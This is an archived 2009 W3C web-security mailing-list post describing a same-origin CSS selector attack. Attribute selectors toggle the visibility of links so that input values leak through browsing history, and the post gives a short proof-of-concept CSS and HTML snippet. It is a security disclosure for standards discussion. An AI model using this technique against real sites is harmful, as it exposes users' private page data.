W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Same origin CSS selector attacks

From: gaz Heyes <gazheyes@gmail.com>
Date: Thu, 10 Dec 2009 09:27:37 +0000
Message-ID: <252dd75b0912100127u5de51e6ob711a8e7b7dfd99e@mail.gmail.com>
To: public-web-security@w3.org
Hi All

Another attack vector not discussed is to use same origin urls to gather
data of HTML values. If you can use a reference to a url on the same site
and influence part of it's value then you can use that data.
So lets say a site allows selectors, display and a normal <a href> (same
origin) link

Then you can do:-
<style>
a {
    display:none;
}
input[value*="ab1"] + a {
    display:block;
}
input[value*="cd1"] + a + a {
    display:block;
}
input[value*="ef1"] + a + a + a{
    display:block;
}
</style>

<input value="cd1xxx" />

<a href="#ab1">ab1</a>

<a href="#cd1">cd1</a>

<a href="#ef1">ef1</a>

This data can be gathered from any site at any point as long as the history
hasn't been cleared. This obviously isn't going to work for bruteforcing
tokens but could be used for simple information disclosure across domains.
Received on Thursday, 10 December 2009 09:28:18 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT